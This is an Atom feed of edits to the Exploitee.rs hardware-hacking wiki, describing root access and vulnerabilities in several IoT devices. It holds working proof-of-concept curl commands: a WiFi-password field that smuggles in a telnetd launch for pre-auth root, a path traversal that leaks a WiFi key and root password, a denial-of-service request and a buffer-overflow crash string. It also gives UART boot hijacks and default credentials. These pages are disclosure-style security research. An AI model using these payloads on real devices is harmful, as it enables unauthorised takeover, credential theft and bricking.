<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.exploitee.rs/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=CJ</id>
	<title>Exploitee.rs - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.exploitee.rs/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=CJ"/>
	<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Special:Contributions/CJ"/>
	<updated>2026-05-02T10:48:44Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.45.0-alpha</generator>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2901</id>
		<title>Tenvis T8810</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2901"/>
		<updated>2017-08-11T01:08:16Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* UART Root */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:TENVIS_T8110.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Networking]]&lt;br /&gt;
&lt;br /&gt;
=Tenvis T8810=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Indoor-Security-Camera-Baby-Monitor/dp/B01MFBBYO8/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Tenvis T8810 at Amazon]&lt;br /&gt;
&lt;br /&gt;
==UART Root==&lt;br /&gt;
The UART interface on this device is located on the main board, above the power connector [pictured], and runs at 115200, 8n1 and auto boots to a Linux kernel after a three second delay in U-Boot. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh, as seen below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
TENVIS_T8110_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Demo ===&lt;br /&gt;
{{#ev:youtube|nxnVUVMNO5Y}}&lt;br /&gt;
&lt;br /&gt;
==Remote Denial of Service==&lt;br /&gt;
&lt;br /&gt;
===WARNING===&lt;br /&gt;
&lt;br /&gt;
This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.&lt;br /&gt;
&lt;br /&gt;
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.1.88/cgi-bin/hi3510/param.cgi&#039; -H &#039;Authorization: Basic YWRtaW46YWRtaW4=&#039; -H &#039;Content-Type: application/x-www-form-urlencoded&#039; -H &#039;Connection: keep-alive&#039; --data &#039;cmd=setwirelessattr&amp;amp;cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&amp;amp;-wf_ssid=%0Assidgoesheres%0D&amp;amp;-wf_auth=3&amp;amp;-wf_mode=%0Dabcdef&amp;amp;-wf_enc=0&amp;amp;-wf_enable=1&amp;amp;-wf_key=key12345&#039; --compressed​&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Lutron_L-BDG2-WH_Caseta_Smart_Bridge%E2%80%8B%E2%80%8B&amp;diff=2900</id>
		<title>Lutron L-BDG2-WH Caseta Smart Bridge​​</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Lutron_L-BDG2-WH_Caseta_Smart_Bridge%E2%80%8B%E2%80%8B&amp;diff=2900"/>
		<updated>2017-08-11T01:05:30Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* UART */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Lutron LBDG2WH Caseta Smart Home Stock.jpg|left|thumb|160px]]&lt;br /&gt;
[[Category:Music Players]]&lt;br /&gt;
&lt;br /&gt;
= Lutron L-BDG2-WH Caseta Smart Bridge​​ =&lt;br /&gt;
&lt;br /&gt;
The  Lutron L-BDG2-WH Caseta Smart Bridge​​ is a home automation bridge allowing you to connect Lutron devices to your home network.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/LUTRON-L-BDG2-WH-Caseta-Wireless-HomeKit-enabled/dp/B00XPW67ZM/ref=as_li_ss_tl?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502255332&amp;amp;sr=8-1&amp;amp;keywords=Lutron+LBDG2WH+Caseta+Smart&amp;amp;linkCode=ll1&amp;amp;tag=exploiteers-20&amp;amp;linkId=cba7e7e286aa7acf3b2fc037bb883e08 Purchase the Lutron L-BDG2-WH Caseta Smart Bridge at Amazon]&lt;br /&gt;
&lt;br /&gt;
== UART ==&lt;br /&gt;
The Lutron L-BDG2-WH Caseta Smart Bridge contains a UART debug port (along with JTAG) which drops to a root shell upon bootup. The pinout for the UART can be seen below. &lt;br /&gt;
&lt;br /&gt;
[[File:Lutron_L-BDG2-WH_Smart_Home_UART.png|400px]]&lt;br /&gt;
&lt;br /&gt;
=== Demo ===&lt;br /&gt;
{{#ev:youtube|ek99HRAKp4Y}}&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=MUZO_Cobblestone&amp;diff=2899</id>
		<title>MUZO Cobblestone</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=MUZO_Cobblestone&amp;diff=2899"/>
		<updated>2017-08-11T01:04:42Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Pre Auth Root Command Injection */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:MUZO.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=MUZO Cobblestone=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/MUZO-Cobblestone-Wi-Fi-Audio-Receiver/dp/B00N9NZIKM/ref=sr_1_1?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502258551&amp;amp;sr=1-1&amp;amp;tag=exploiteers-20 Purchase the MUZO Cobblestone at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Telnet Default Credentials==&lt;br /&gt;
&lt;br /&gt;
The device permits logins with root permissions with the username of &amp;lt;code&amp;gt;admin&amp;lt;/code&amp;gt; and password of &amp;lt;code&amp;gt;admin&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Pre Authorization Root Command Injection==&lt;br /&gt;
&lt;br /&gt;
A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.&lt;br /&gt;
&lt;br /&gt;
Proof of Concept:&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.43.37/httpapi.asp&#039; -H &#039;CONTENT-TYPE: application/x-www-form-urlencoded&#039; -H &#039;Accept: */*&#039; -H &#039;Cache-Control: no-cache&#039; -H &#039;Connection: keep-alive&#039; -H &#039;If-Modified-Since: 0, 0&#039; --data &#039;command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0&#039; --compressed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=MUZO_Cobblestone&amp;diff=2898</id>
		<title>MUZO Cobblestone</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=MUZO_Cobblestone&amp;diff=2898"/>
		<updated>2017-08-11T00:45:41Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Telnet Default Credentials */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:MUZO.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=MUZO Cobblestone=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/MUZO-Cobblestone-Wi-Fi-Audio-Receiver/dp/B00N9NZIKM/ref=sr_1_1?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502258551&amp;amp;sr=1-1&amp;amp;tag=exploiteers-20 Purchase the MUZO Cobblestone at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Telnet Default Credentials==&lt;br /&gt;
&lt;br /&gt;
The device permits logins with root permissions with the username of &amp;lt;code&amp;gt;admin&amp;lt;/code&amp;gt; and password of &amp;lt;code&amp;gt;admin&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Pre Auth Root Command Injection==&lt;br /&gt;
&lt;br /&gt;
Target: /httpapi.asp&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.43.37/httpapi.asp&#039; -H &#039;CONTENT-TYPE: application/x-www-form-urlencoded&#039; -H &#039;Accept: */*&#039; -H &#039;Cache-Control: no-cache&#039; -H &#039;Connection: keep-alive&#039; -H &#039;If-Modified-Since: 0, 0&#039; --data &#039;command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0&#039; --compressed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connect to the telnet service as root&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=GGMM_E3_Smart_Speaker&amp;diff=2897</id>
		<title>GGMM E3 Smart Speaker</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=GGMM_E3_Smart_Speaker&amp;diff=2897"/>
		<updated>2017-08-11T00:44:52Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Pre Auth Root Command Injection */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:GGMME3.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=GGMM E3 Smart Speaker=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA/ref=sr_1_1?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502258299&amp;amp;sr=1-1&amp;amp;tag=exploiteers-20 Purchase the GGMM E3 Smart Speaker at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Pre-Authorization Root Command Injection==&lt;br /&gt;
&lt;br /&gt;
A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.&lt;br /&gt;
&lt;br /&gt;
Proof of Concept:&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.43.37/httpapi.asp&#039; -H &#039;CONTENT-TYPE: application/x-www-form-urlencoded&#039; -H &#039;Accept: */*&#039; -H &#039;Cache-Control: no-cache&#039; -H &#039;Connection: keep-alive&#039; -H &#039;If-Modified-Since: 0, 0&#039; --data &#039;command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0&#039; --compressed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connect to the telnet service as root&lt;br /&gt;
&lt;br /&gt;
=== Demo ===&lt;br /&gt;
{{#ev:youtube|rxtb88qYanI}}&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=VeraEdge_Smart_Home&amp;diff=2896</id>
		<title>VeraEdge Smart Home</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=VeraEdge_Smart_Home&amp;diff=2896"/>
		<updated>2017-08-11T00:42:01Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Local File Disclosure */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:VERAEDGE.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Home Automation]]&lt;br /&gt;
&lt;br /&gt;
=VeraEdge-US Smart Home Controller=&lt;br /&gt;
The VeraEdge-US is a smart home controller used for bridging smart home devices with a users WiFi network.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Vera-Control-VeraEdge-US-Smart-Controller/dp/B00PFGJZM8/ref=as_li_ss_tl?ie=UTF8&amp;amp;qid=1502364546&amp;amp;sr=8-1&amp;amp;keywords=VeraEdge-US+Smart+Home+Controller&amp;amp;linkCode=ll1&amp;amp;tag=exploiteers-20&amp;amp;linkId=c579b21805465293a2ad7a0f2e5ee9f3 Purchase the VeraEdge-US Smart Home Controller at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Local File Disclosure==&lt;br /&gt;
VeraEdge-US Smart Home contains a Local File Disclosure via get_file.sh and store_file.sh, both which can be hit without authentication. Below you can find the code within get_file.sh.&lt;br /&gt;
&lt;br /&gt;
[[File:VERAEDGE LFD ROOT.JPG]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately get_file requires a directory to exist which store_file conveniently creates. A POC for retrieving the file containing the devices SSID and WiFi key (/etc/cmh/cmh.conf) can be seen below.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
curl -X POST -v &#039;http://&amp;lt;DEVICEIP&amp;gt;/cgi-bin/cmh/store_file.sh&#039; --data store_file=123&lt;br /&gt;
curl -X POST -v &#039;http://&amp;lt;DEVICEIP&amp;gt;/cgi-bin/cmh/get_file.sh&#039; --data filename=&amp;quot;../../../../../etc/cmh/cmh.conf&amp;quot;&lt;br /&gt;
&lt;br /&gt;
ArchiveLogsOnServer=1&lt;br /&gt;
ESSID=mios_45026848&lt;br /&gt;
Password=wind72sand&lt;br /&gt;
HW_Key=3sMwesqBERodWW7l3mew43fsC1d3sf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Root SSH Access ==&lt;br /&gt;
Utilizing the Local File Disclosure mentioned above, one can obtain the device specific WiFi information (SSID and Password) for the device. Conveniently the WiFi Password is the same as the password for the &amp;quot;root&amp;quot; user account.&lt;br /&gt;
&lt;br /&gt;
SSHing to the device, with a login of root, and the device specific password, one can obtain root privileges remotely on the device.&lt;br /&gt;
&lt;br /&gt;
=== Demo ===&lt;br /&gt;
{{#ev:youtube|Q02ZYHT5Efo}}&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Zmodo_Greet&amp;diff=2895</id>
		<title>Zmodo Greet</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Zmodo_Greet&amp;diff=2895"/>
		<updated>2017-08-11T00:39:18Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* UART */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
This page will be dedicated to a general overview of descriptions and information related to The Zmodo Greet&lt;br /&gt;
[[File:Zmodo greet.JPG|70px|left|thumb]]&lt;br /&gt;
[[Category:Cameras]]&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
You can purchase [https://www.amazon.com/Zmodo-Greet-Smart-Video-Doorbell/dp/B014A6M4ZI/ref=as_li_ss_tl?ie=UTF8&amp;amp;qid=1501631152&amp;amp;sr=8-2&amp;amp;keywords=zmodo+greet&amp;amp;linkCode=ll1&amp;amp;tag=exploiteers-20&amp;amp;linkId=0c97588b3859a323c9d44338e9cd9374 The Zmodo Greet on Amazon].&lt;br /&gt;
&lt;br /&gt;
== About ==&lt;br /&gt;
The Zmodo Greet is a WiFi doorbell with a camera and two way audio communication.&lt;br /&gt;
&lt;br /&gt;
== Power ==&lt;br /&gt;
Powering this board is a bit of a challenge. It expects to be connected to a 10-36V AC source in series with a doorbell chime. Just connecting a DC source to the input doesn&#039;t work. We found the best method is to solder a connection to the DC side of the rectifier and supply a low DC voltage there (we used a 9V battery).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Zmodo Greet Power.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== UART ==&lt;br /&gt;
The main board has a UART broken out to two test points on the back. During boot you can use this UART to get a U-Boot shell. Once the device has finished booting the UART presents a root busybox shell. The UART runs at 115200 baud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Zmodo_Greet_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Demo ===&lt;br /&gt;
{{#ev:youtube|GVg_4DbbPUE}}&lt;br /&gt;
&lt;br /&gt;
== Software Vulnerabilities ==&lt;br /&gt;
While the Zmodo Greet is in setup mode it hosts a WiFi network and accepts an HTTP request to configure the device. This HTTP request is handled by a CGI binary that has a serious buffer overflow vulnerability.&lt;br /&gt;
&lt;br /&gt;
If you connect to the setup network, you can use this curl command to cause the binary to crash:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&lt;br /&gt;
curl http://&amp;lt;DEVICE_IP&amp;gt;/cgi-bin/output.cgi\?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\&lt;br /&gt;
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbbb&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This causes the process to jump to the address 0x61616160 (&amp;quot;AAA`&amp;quot; in ASCII). With some development this could be made into a remote code execution attack. The device does have ASLR enabled, so it will take some work to make a viable payload.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Zmodo Greet Buffer Overflow.png&lt;br /&gt;
File:Zmodo Greet aaaaaa.png&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Amazon_Tap&amp;diff=2876</id>
		<title>Amazon Tap</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Amazon_Tap&amp;diff=2876"/>
		<updated>2017-08-10T01:25:18Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* UART */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Amazon_Tap_Stock_Photo.jpg|left|thumb|160px]]&lt;br /&gt;
[[Category:Music Players]]&lt;br /&gt;
&lt;br /&gt;
=Amazon Tap=&lt;br /&gt;
&lt;br /&gt;
